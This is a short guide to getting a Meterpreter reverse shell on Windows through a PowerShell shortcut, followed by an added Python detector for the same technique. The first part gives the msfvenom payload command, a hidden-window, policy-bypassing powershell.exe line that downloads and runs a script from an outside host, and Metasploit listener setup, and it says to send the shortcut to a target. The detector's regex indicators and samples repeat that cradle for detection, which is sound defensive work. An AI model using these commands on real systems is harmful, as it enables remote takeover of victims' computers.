Reverse shell to msf via a PowerShell shortcut

Generate an msf backdoor

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f psh-reflection > psl.psl

 

Create a shortcut on Windows:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx.com/psl.psl');"

 

or

msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=4444 LHOST=xxx.xxx.xxx.xxx -f psh-cmd

 

Start the msf listener, then send the shortcut to the target

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

….

 

chcp 65001
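
On the detection side, the shortcut target above produces a distinctive powershell.exe command line in process-creation logs (for example Sysmon Event ID 1, or Security 4688 with command-line auditing). The following is an added example, not part of the original note: the function names, indicator names and sample lines are constructed for illustration, and the host is a placeholder.

```python
import re

# Indicators taken from the shortcut target on this page. The patterns also
# accept the shortened parameter spellings that powershell.exe allows.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass\b", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden\b", re.I),
    "non_interactive": re.compile(r"-noni\w*", re.I),
    "no_profile": re.compile(r"-nop\w*", re.I),
    "web_download": re.compile(r"net\.webclient|downloadstring", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

def matched_indicators(cmdline):
    """Return the sorted indicator names found in one process command line."""
    if "powershell" not in cmdline.lower():
        return []
    return sorted(n for n, rx in INDICATORS.items() if rx.search(cmdline))

def is_suspicious(cmdline):
    """Flag a download-and-execute cradle, or policy bypass plus hidden window."""
    hits = set(matched_indicators(cmdline))
    cradle = {"web_download", "invoke_expression"} <= hits
    stealth = {"execution_policy_bypass", "hidden_window"} <= hits
    return cradle or stealth

# Constructed sample command lines (not real telemetry); host is a placeholder.
SAMPLES = [
    r'''C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/psl.psl');"''',
    r'powershell -ep bypass -w hidden -nop -c "Write-Output test"',
    r'powershell.exe -NoProfile -File C:\Scripts\backup.ps1',
    r'C:\Windows\System32\notepad.exe C:\notes\iex-downloadstring.txt',
]

if __name__ == "__main__":
    for line in SAMPLES:
        verdict = "ALERT" if is_suspicious(line) else "ok"
        print(verdict, matched_indicators(line), line[:60])
```

A parent process of explorer.exe together with these indicators is consistent with a launch from a shortcut; parent-process checks are not implemented here.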